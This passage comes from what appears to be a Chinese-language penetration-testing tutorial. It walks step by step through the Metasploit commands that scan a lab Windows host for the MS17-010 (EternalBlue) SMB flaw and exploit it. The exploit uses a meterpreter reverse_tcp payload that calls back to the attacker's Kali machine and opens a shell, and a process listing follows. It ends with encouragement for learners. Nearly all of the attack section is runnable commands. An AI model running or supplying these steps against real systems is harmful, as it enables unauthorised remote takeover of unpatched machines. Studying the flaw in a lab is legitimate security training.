3:利用msf的auxiliary模块进行漏洞验证
search ms17-010 //查询MS17-010永恒之蓝漏洞信息
use auxiliary/scanner/smb/smb_ms17_010 //使用辅助扫描smb,是否存在永恒之蓝漏洞
set rhost 192.168.200.103 //设置目标IP
set rport 445 //设置目标端口
run //开始扫描
4:设置攻击目标、端口、本机
use exploit/windows/smb/ms17_010_eternalblue //利用永恒之蓝漏洞
set rhost 192.168.200.103 //设置目标IP
set rport 445 //设置目标端口
set lhost 192.168.200.101 //设置kali linux IP地址
set payload windows/x64/meterpreter/reverse_tcp //使用reverse_tcp攻击荷载
show options //查看是否设置完成
run //开始攻击
若成功则拿到目标机的shell
6:输入ps查看进程
#找到explorer.exe进程(记住PID)
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1996 1980 explorer.exe x86 0 VIOLET\violetevergarden C:\WINDOWS\Explorer.EXE
刚开始使用的时候,的确会碰到这种情况(我碰到无数次了都。。)加油!不是所有的笔记都是对的,只是起到抛砖引玉的作用,要自己思考和拿捏!只有自己思考出来的才会是自己的!学渗透不是一朝一夕的事,要慢慢来。我就是想说今天失败了不代表明天失败,有句英语说的好Rome,is not bulit in one day